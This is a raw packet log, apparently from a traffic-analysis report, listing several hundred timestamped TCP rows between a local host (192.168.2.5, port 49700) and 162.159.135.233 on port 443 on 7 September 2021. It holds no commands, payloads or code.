Sep 7, 2021 18:16:41.095705032 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.095763922 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.095803022 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.095840931 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.095844984 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.095868111 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.095879078 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.095890045 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.095920086 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.095927954 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.095971107 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.096694946 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.096735001 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.096770048 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.096784115 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.096811056 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.096817017 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.096858025 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.097531080 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.097568989 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.097590923 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.097610950 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.097615957 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.097656012 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.097657919 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.097701073 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.098305941 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.098361969 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.098362923 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.098408937 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.098416090 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.098454952 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.098459959 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.098505974 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.099088907 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.099143028 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.099164963 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.099206924 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.099245071 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.099299908 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.099327087 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.099330902 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.099945068 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.099987984 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.100023985 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.100061893 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.100061893 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.100105047 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.100109100 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.100758076 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.100795984 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.100827932 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.100841999 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.100884914 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.100965977 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.100996017 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.100999117 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.101569891 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.101613045 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.101639986 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.101650953 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.101654053 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.101686954 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.101757050 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.101794004 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.102399111 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.102437019 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.102464914 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.102483034 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.102483988 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.102526903 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.102534056 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.102576971 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.103332996 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.103373051 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.103393078 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.103409052 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.103410006 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.103447914 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.103456020 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.103491068 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.104073048 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.104257107 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.104296923 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.104312897 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.104335070 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.104347944 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.104371071 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.104377031 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.104413986 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.105123997 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.105161905 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.105174065 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.105205059 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.105209112 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.105253935 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.105261087 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.105302095 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.105925083 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.105966091 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.105978966 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.106004953 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.106009007 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.106050014 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.106054068 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.106102943 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.106848001 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.106887102 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.106899023 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.106937885 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.106940985 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.106983900 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.106992006 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.107050896 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.112577915 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.112622976 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.112659931 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.112694025 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.112709999 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.112732887 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.112735987 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.112757921 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.112775087 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.113040924 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.113090992 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.113138914 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.113374949 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.113415956 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.113424063 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.113455057 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.113467932 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.113491058 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.113503933 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.113531113 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.113538027 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.113580942 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.114343882 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.114386082 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.114420891 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.114428997 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.114442110 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.114459038 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.114459038 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.114496946 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.114501953 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.114538908 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.115251064 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.115310907 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.115319014 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.115350962 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.115381002 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.115416050 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.115417004 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.115469933 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.116101980 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.116146088 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.116179943 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.116197109 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.116199017 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.116249084 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.116292000 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.116314888 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.116349936 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.116971970 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.117019892 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.117037058 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.117060900 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.117069006 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.117099047 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.117111921 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.117136955 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.117149115 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.117182970 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.117857933 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.117913961 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.117953062 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.117969036 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.117995977 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.118000031 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.118041992 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.118052959 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.118092060 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.118752956 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.118793964 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.118813992 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.118832111 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.118834972 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.118868113 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.118882895 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.118906021 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.118916035 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.118954897 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.119652033 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.119694948 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.119730949 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.119767904 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.119784117 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.119805098 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.119807959 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.119823933 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.119853973 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.120515108 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.120558023 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.120578051 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.120594025 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.120618105 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.120636940 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.120640993 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.120682955 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.120696068 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.120740891 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.121408939 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.121454000 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.121493101 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.121500969 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.121526957 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.121567011 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.121929884 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.121972084 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.122010946 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.122026920 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.122046947 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.122065067 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.122086048 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.122098923 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.122131109 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.122818947 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.122869015 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.122895956 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.122910976 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.122946978 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.122948885 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.122960091 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.122987986 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.122996092 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.123034000 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.123697042 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.123753071 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.123797894 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.123816013 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.123835087 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.123848915 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.123881102 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.123883963 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.124006033 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.124444962 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.124500036 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.124509096 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.124552965 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.124555111 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.124602079 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.124612093 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.124644995 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.124654055 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.124681950 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.124695063 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.124732018 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.125355005 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.125427961 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.125431061 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.125479937 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.125487089 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.125535965 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.125545979 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.125600100 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.125600100 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.125643015 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.125648975 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.125699043 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.126250982 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.126293898 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.126308918 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.126332045 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.126344919 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.126368046 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.126374960 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.126406908 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.126415968 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.126444101 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.126449108 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.126493931 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.127094984 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.127175093 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.127197981 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.127255917 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.127263069 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.127316952 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.127321959 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.127378941 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.127419949 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.127435923 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.127443075 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.127492905 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.127919912 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.127955914 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.127986908 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.128010988 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.128019094 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.128051043 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.128051996 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.128083944 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.128092051 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.128107071 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.128150940 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.128782034 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.128819942 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.128853083 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.128884077 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.128912926 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.129210949 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.129251957 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.129266024 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.129288912 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.129298925 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.129321098 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.129336119 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.129354000 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.129367113 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.129385948 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.129400969 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.129431963 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.130054951 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.130098104 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.130115986 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.130134106 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.130141973 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.130166054 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.130178928 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.130198002 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.130214930 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.130229950 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.130240917 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.130275011 CEST	49700	443	192.168.2.5	162.159.135.233
